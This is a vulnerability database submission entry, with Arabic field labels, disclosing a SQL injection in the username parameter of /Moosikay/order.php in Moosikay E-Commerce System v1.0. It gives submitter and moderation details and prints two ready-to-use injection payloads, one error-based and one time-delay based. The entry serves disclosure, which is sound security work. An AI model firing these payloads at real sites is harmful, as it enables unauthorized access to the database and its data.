| عنوان | Moosikay - E-Commerce System v1.0 /Moosikay/order.php post parameter 'username' exists SQL injection vulnerability |
|---|
| الوصف | An issue was discovered in Moosikay - E-Commerce System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /Moosikay/order.php post parameter username.
Error injection payload: username=a'&password=b&login=
Delayed injection payload:username=a' and (select 1 FROM (select(sleep(10)))a)-- b&password=b&login= |
|---|
| المصدر | ⚠️ https://github.com/jidle123/bug_report/blob/main/vendors/razormist/Moosikay%20-%20E-Commerce%20System/SQLi-1.md |
|---|
| المستخدم | jidle (UID 41297) |
|---|
| ارسال | 23/02/2023 10:10 AM (3 سنوات منذ) |
|---|
| الاعتدال | 24/02/2023 08:29 AM (22 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 221732 [SourceCodester Moosikay E-Commerce System 1.0 POST Parameter /Moosikay/order.php أسم المستخدم حقن SQL] |
|---|
| النقاط | 18 |
|---|